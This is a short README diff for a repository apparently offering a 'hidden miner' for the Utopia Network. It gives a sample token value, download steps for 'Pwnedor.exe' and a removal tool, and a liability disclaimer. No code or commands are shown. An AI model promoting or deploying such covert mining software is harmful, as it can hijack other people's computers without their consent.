Ablencesee123/Hidden-Miner-for-Utopia-Network/README.md

 Exemple of content of token.txt file :
 45675BC9A6E34147862140CA8B30E130

+# Download
+Dowload from Github and extract Pwnedor.7z you will find Pwnedor.exe which is the software.
+If you need to delet all compoment of the Pwnedor, Download "killPwnedor.7z", extract and launch "killPwnedor.exe"

 # informations
 A responsibility: The Developer shall not be liable for any damage, direct or indirect damages (including losses from loss of profit,